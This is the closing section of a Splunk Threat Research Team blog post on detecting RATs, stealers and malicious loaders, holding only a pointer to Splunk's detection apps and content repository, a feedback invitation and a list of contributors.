Appendix: Splunk Threat Research Team Blog References
Learn More
This blog helps security analysts, blue teamers, and Splunk users identify commonalities in RATs, Trojan stealers and malicious loaders by enabling the community to discover related tactics, techniques, and procedures used by threat actors and adversaries. You can implement the detections in this blog using the Enterprise Security Content Updates app or the Splunk Security Essentials app. To view the Splunk Threat Research Team's complete security content repository, visit research.splunk.com.
Feedback
Any feedback or requests? Feel free to put in an issue on GitHub and we’ll follow up. Alternatively, join us on the Slack channel #security-research.
Contributors
We would like to thank Nasreddine Bencherchali and Teoderick Contreras for authoring this post and the entire Splunk Threat Research Team for their contributions: Michael Haag, Bhavin Patel, Rod Soto, Eric McGinnis, Patrick Bareiss, Raven Tait, AJ King and Jose Hernandez.